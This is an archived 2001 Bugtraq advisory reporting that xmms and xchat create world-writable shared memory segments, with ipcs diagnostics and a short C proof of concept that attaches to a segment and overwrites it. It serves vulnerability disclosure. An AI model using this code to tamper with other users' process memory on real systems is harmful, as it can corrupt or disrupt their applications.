7430047 2001-11-03 12:22 +0200 /67 rader/ Julien VANEGUE <vanegu_j@epita.fr>
Sänt av: joel@lysator.liu.se
Importerad: 2001-11-05 03:42 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Externa svar till: vanegu_j@epita.fr
Mottagare: Bugtraq (import) <19669>
Ärende: xmms/xchat full access shared memory segments
------------------------------------------------------------
From: Julien VANEGUE <vanegu_j@epita.fr>
To: bugtraq@securityfocus.com
Message-ID: <0111031122230M.12122@daril>
On slackware 8 :
bash-2.05$ ipcs -m
------ Shared Memory Segments --------
key shmid owner perms bytes nattch status
0x00000000 4216960 mayhem 777 196608 2 dest
0x00000000 7636737 mayhem 777 196608 2 dest
bash-2.05$ ipcs -p -m
------ Shared Memory Creator/Last-op --------
shmid owner cpid lpid
4216960 mayhem 3921 1406
7636737 mayhem 26206 26209
bash-2.05$ cat /proc/3921/cmdline ; echo
/opt/gnome/bin/xmms
bash-2.05$ cat /proc/26206/cmdline ; echo
/opt/gnome/bin/xchat
bash-2.05$
Seems not to be exploitable (no fault) but still need to be fixed .
/*
** test_shm.c
**
** Made by Julien Vanegue
** Login <mayhem@hert.org>
*/
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/shm.h>
#include <stdio.h>
#include <stdlib.h>
#define FATAL(str) { perror(str); exit(-1); }
void usage()
{
fprintf(stderr, "syntax: a.out semid size \n");
exit(-1);
}
int main(int argc, char **argv)
{
char *addr;
if (argc != 3)
usage();
if ((addr = shmat(atoi(argv[1]), 0, 0)) == (void *) -1)
FATAL("shmget");
memset(addr, 'A', atoi(argv[2]));
sleep(2);
}
(7430047) /Julien VANEGUE <vanegu_j@epita.fr>/------